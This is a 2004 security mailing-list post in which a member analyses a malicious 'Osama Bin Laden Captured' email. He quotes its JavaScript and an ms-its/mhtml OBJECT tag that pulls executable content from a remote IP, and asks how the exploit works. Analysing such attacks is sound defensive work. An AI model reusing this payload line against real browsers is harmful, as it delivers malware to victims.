[Dshield] FW: Osama Bin Laden Captured

Pete Cap peteoutside at yahoo.com
Fri Apr 23 18:29:22 GMT 2004


Greetings, List:
 
I know very little about Javascript but here's what I was able to figure out, for what it's worth.
 
The activex objects call the script S, which has two lines:
var s=location.href.substr(7);
return s.substr(0,s.indexOf('/'))
 
The first line defines the variable "s" as a substring of variable "location.href" (the current url in the browser window--in this case, http://220.95.231.54/pics/ starting at position 7 (e.g. excluding the http:// portion).
 
The second line returns ANOTHER substring of the resulting text ("220.95.231.54/pics") starting at position 0 and going to however long it is to the first instance of "/"...so you end up with this:
 
object data=”ms-its:mhtml:file://c:\foo.mht!http://220.95.231.54/pics.chm::/pics.htm” type=”text/x-scriptlet”
 
I don't know if all that rigamarole helps to obfuscate the url, but essentially I think what it's for is to make tailoring the e-mail easy...in order to point to a new download source, you don't need to modify the javascript, only the url that the user clicks on.
 
I also don't know why the first attempt occurs inside a textarea...
 
As far as the exploit goes, essentially what's happening is the browser is extracting foo.mht from pics.chm and executing it as C:\pics.htm, correct?  And this can be any kind of executable content?  Have I got this right?

Couple of questions:
1. Could you just use a browser redirect to start this process or is it essential that the user click on the link?
2. Does the process by which the hostile content is retrieved need to be in an OBJECT tag or can it be in any data request (e.g. an IMG tag)?
3. Why does one attempt in this example occur in a textarea?
 
Hope someone can help.
 
Regards,
Pete

		
---------------------------------
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢


More information about the list mailing list